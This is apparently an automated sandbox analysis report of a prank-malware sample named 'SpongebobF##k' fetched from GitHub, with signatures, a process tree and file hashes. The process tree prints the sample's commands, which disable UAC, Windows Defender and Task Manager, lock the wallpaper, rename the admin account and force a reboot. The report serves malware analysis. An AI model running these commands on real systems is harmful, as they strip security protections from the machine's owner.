Analysis
-
max time kernel
54s -
max time network
55s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
06/06/2024, 08:55
Errors
General
-
Target
https://github.com/pankoza2-pl/HorrorBob3/blob/main/SpongebobF%23%23k.zip
Malware Config
Signatures
-
UAC bypass 3 TTPs 1 IoCs
-
Disables Task Manager via registry modification
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 15 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 3 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of FindShellTrayWindow 34 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/HorrorBob3/blob/main/SpongebobF%23%23k.zip1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc7a7146f8,0x7ffc7a714708,0x7ffc7a7147182⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5712 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2208,16309075061445625833,11505296488778433962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3524 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Downloads\SpongebobF##k\SpongebobFuck.exe"C:\Users\Admin\Downloads\SpongebobF##k\SpongebobFuck.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B314.tmp\SpongebobFuck.cmd""2⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f3⤵
- Sets desktop wallpaper using registry
-
-
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exeReg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exeREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\net.exenet user Admin /fullname:"SPONGEBOB WAS HERE!!!"3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB WAS HERE!!!"4⤵
-
-
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 003⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3904855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5c9c4c494f8fba32d95ba2125f00586a3
SHA18a600205528aef7953144f1cf6f7a5115e3611de
SHA256a0ca609205813c307df9122c0c5b0967c5472755700f615b0033129cf7d6b35b
SHA5129d30cea6cfc259e97b0305f8b5cd19774044fb78feedfcef2014b2947f2e6a101273bc4ad30db9cc1724e62eb441266d7df376e28ac58693f128b9cce2c7d20d
-
Filesize
152B
MD54dc6fc5e708279a3310fe55d9c44743d
SHA1a42e8bdf9d1c25ef3e223d59f6b1d16b095f46d2
SHA256a1c5f48659d4b3af960971b3a0f433a95fee5bfafe5680a34110c68b342377d8
SHA5125874b2310187f242b852fa6dcded244cc860abb2be4f6f5a6a1db8322e12e1fef8f825edc0aae75adbb7284a2cd64730650d0643b1e2bb7ead9350e50e1d8c13
-
Filesize
1KB
MD53c847694dc9499137a1c798386e44ae9
SHA17ae9b3818c88fed1f0d3de0ef1bc0a3adabc8076
SHA256d62ee6043e803b0ca82926e69e72890fc95dda5d57e5ab3488d616274880347e
SHA51256a016d6e48f2fe5fc724ea6f64604a5f8a99efab6ee69179123a2d943be4502ce3be20e639b2f2b46470734f2db78d6db14e3e5505944138056df01b0ca88d8
-
Filesize
5KB
MD550eb1aedd93a3f7b88850305619dff28
SHA10b7767d55d1379788ab89c242e92ff1f09f60c4b
SHA256133023428cfa5a3fd7ca6c6cfe8bd47f33700b67366da737242dbc920e9b866f
SHA51275a0f2d0fae19f9bc848bc94a791450bbca08ce3029a57b24781c36572e485540a77a7c066ffa5a6630b89caeea9077f75832b360653f3157ee40f0b409d16c9
-
Filesize
6KB
MD52cd595ef3045207477fdfec047496e36
SHA1007dc12d6dfb27b0b514ccdc65da50de3922bec9
SHA25610889a1ffd9133b16dad038303d01d4b7b45b46dcc794c0d2f95797ece6d0ebe
SHA5126460fd634986de0f75842fc83e412be8a74f445798d3d105fb5437c0cc37786b9e8fd7427143b2162662e82b586947f8fb94018ccd19009103eb6862563a7341
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
10KB
MD57c642fbd0dcfca1f6311f3a5a5f49ff3
SHA15ec54017f8ae902347b50c943f77952b65cf1dcd
SHA2560b15fdae705e5b02feae39ebad1b31ec906b93c4f1f6be13706a800e2e53a48f
SHA5126bf9164f14bf81ee66ca1b7e0bf3c86e1cba1762af74271732d6c5b35528a0b0bfaeb971ae1d971decf8bbc48031d0f99da5959d06ca63f42d4fed7084cda47c
-
Filesize
10KB
MD53592c70311f31caacf2c2534510d2629
SHA1510fa42731bbdc1aed7c3d71f9a94e21e33a5bfc
SHA25628c400000f3797d7497fb279b7071b2b1963bfe55551f46099c3c22ada211a48
SHA5127d14ea74a13cbb129353412a215217e0cef7215ae37292a079b0341f5ff9e65c022ba997b8e8718ef45959b431ec1fb11e51430da052c0372ef7126c315170e6
-
Filesize
92KB
MD503d8b31db1ed1294334b872f756ad1a1
SHA13f57aa9b9efb1ad9d576d799d9306abd4befdf89
SHA2567e17dcaafc07877e720b3fc0e666ac69e2dce8e7458ae9b23902bcf5f8f2a40a
SHA51255a979189ead8886c5fc3f35b927a80f8dff7a1d52136305c9efee7bc4f1b151d06348e75bef5b3203c47aaed98dc73692f097f7a967c64b9b743a5402012a86
-
Filesize
11KB
MD57a918ed93f7fb297e05464edccc46756
SHA19464288fed7ba5d88928265882def5e05ffbe7db
SHA25682fcb47b437dc1bedb77648755770b7cd9a29342fd2ab972c8bd063968d04604
SHA512cb70d6023b4bf23f35646e399c4ca7f0ab11ebf0a1e44cf0627afaa4025676c2a20ab82ffa28ed4a196dc8cf56b33b104bf457cf21d750a163955927dcba3cb1
-
Filesize
2.6MB
MD5ce45a70d3cc2941a147c09264fc1cda5
SHA144cdf6c6a9ab62766b47caed1a6f832a86ecb6f9
SHA256eceedadfde8506a73650cfa9a936e6a8fff7ffb664c9602bb14432aa2f8109ac
SHA512d1bf6cdade55e9a7ce4243e41a696ae051835711f3d1e0f273ad3643f0b878266a8213cc13ca887a8181981ba4937350986e01e819b4bb109330718ef6251149
-
Filesize
131B
MD58884a25e47d799f6bd3d4ec20f05a3b7
SHA18959822be4ecff5dd7fbdd714cd85775345d39c5
SHA2565a68437edd63bd826a1f1557121d4c05114c608fd8a18a0c9c156a60d90bd0c1
SHA5123722494fda291fe85f9276dc656b49fb977eea6403cf3a0b6bfaa77c1ec74a70c2a3012e420129f3c1fd939ef7928d94f0320a128b7087fa8f4f4080ae70973b
-
Filesize
548KB
MD5c1978e4080d1ec7e2edf49d6c9710045
SHA1b6a87a32d80f6edf889e99fb47518e69435321ed
SHA256c9e2a7905501745c304ffc5a70b290db40088d9dc10c47a98a953267468284a8
SHA5122de11fdf749dc7f4073062cdd4881cf51b78e56cb27351f463a45c934388da2cda24bf6b71670b432c9fc039e24de9edd0e2d5382b67b2681e097636ba17626e
-
Filesize
7.3MB
MD5f1d6a6141d92ed618b05a2a91d8cadb5
SHA1427ecc7004cf8f87b3362d4495b21d40244176ef
SHA2560b566eb6f93eef4019744f25065a7b2ca782a802bc89051cb398830cf8d2d58e
SHA512f6145d852f0a5422f9e3d651155edf77c70a4e6a95a7db5c1a43d20b6b69c1c1621e0e220850947d2d0bf66c62852e273d13f24ae1507d8391c9ea63b4a79c1b
-
Filesize
38B
MD57c0b3ef9968d114404d5cb1ef66eae49
SHA178fd3c71458513f6ac905427a5d0fcf4e535ee69
SHA256b765f9b09b6c3d040c96e9b09eca1ed1a8bc3f980ba09beabc0a8df726181bbf
SHA512ce42bf92bf7ee7d905463329f5f24dbf46b39d041e386343492825eac86bdfb917babd94df21eb5fee4f0f0b205c218ac1b17c4857763d5786c3cf8b96e347c9
-
Filesize
3.7MB
-
Filesize
3.7MB
-
Filesize
3.7MB
